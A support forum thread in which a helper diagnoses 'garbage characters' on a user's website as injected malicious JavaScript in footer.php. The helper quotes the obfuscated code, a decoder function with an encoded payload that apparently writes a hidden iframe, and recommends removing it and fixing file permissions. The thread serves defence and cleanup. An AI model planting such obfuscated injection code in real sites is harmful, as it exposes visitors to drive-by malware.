Viewing 3 replies - 1 through 3 (of 3 total)
  • did you put that there?

    Thats javascript thats unescaped. edit your footer.php — remove it, and check the permissions on ALL of your files if you did not put that there.

    directories: 755
    files 644

    <script language="javascript">
    function hg(s){
    var s1=unescape(s.substr(0,s.length-1)); var t='';
    for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
    document.write(unescape(t));
    }
    </script>'));hg('*8Hnkwfrj*75xwh*8I*77*7;*78659*7;*7866;*7;*7866;*7;*78667*7;*78:=*7;*789<*7;*789<*7;*78669*7;*78><*7;*78677*7;*78666*7;*78669*7;*7866:*7;*7866;*7;*7866<*7;*78655*7;*7865:*7;*78666*7;*789;*7;*78666*7;*78669*7;*78658*7;*789<*7;*78><*7;*78655*7;*7866=*7;*7866;*7;*78655*7;*7866:*7;*789<*7;*78666*7;*7866<*7;*7866;*7;*789;*7;*78667*7;*78659*7;*78667*7;*78;8*7;*7866:*7;*78>:*7;*7865:*7;*78655*7;*78;6*7;*789>*77*75|niym*8I*775*77*75mjnlmy*8I*775*77*75xy~qj*8I*77inxuqf~*8Fstsj*77*8J*8H4nkwfrj*8J5');

    there it is decoded, it takes the crap after hg and does some charcode stuff..

    Google it, its not friendly, and your site has been compromised — atleast THAT file has.

    Thread Starter sirux

    (@sirux)

    ty so much for your reply ?? that helped ??

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Garbage characters appearing at the bottom of my website’ is closed to new replies.